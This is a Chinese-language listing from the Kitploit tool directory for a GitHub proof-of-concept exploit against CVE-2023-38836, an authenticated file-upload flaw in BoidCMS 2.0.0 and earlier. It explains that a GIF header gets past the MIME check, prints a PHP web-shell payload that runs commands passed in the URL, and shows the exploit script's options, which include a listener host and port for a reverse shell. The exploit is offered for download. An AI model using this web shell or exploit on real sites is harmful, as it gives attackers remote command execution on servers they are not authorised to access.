Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/1337kid/cve-2023-38836
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHub1337kid/cve-2023-38836

CVE-2023-38836

针对BoidCMS版本<=2.0.0中文件上传漏洞的PoC利用代码

查看仓库
512年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-38836 漏洞利用工具

BoidCMS v2.0.0 中存在文件上传漏洞,允许已认证的攻击者上传危险类型文件 (CWE-434)。
要利用此漏洞,攻击者可以添加 GIF 文件头以绕过 MIME 类型检查。

root@kitploit:~
GIF89a;
<?php system($_GET["cmd"]); ?>

使用方法

root@kitploit:~
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

CVE-2023-38836 漏洞利用工具

options:
  -h, --help            显示此帮助信息并退出
  -u URL, --url URL     网站 URL
  -U USER, --user USER  管理员用户名
  -P PASSWD, --passwd PASSWD
                        管理员密码
  -l LHOST, --lhost LHOST
                        监听主机
  -p LPORT, --lport LPORT
                        监听端口

下载工具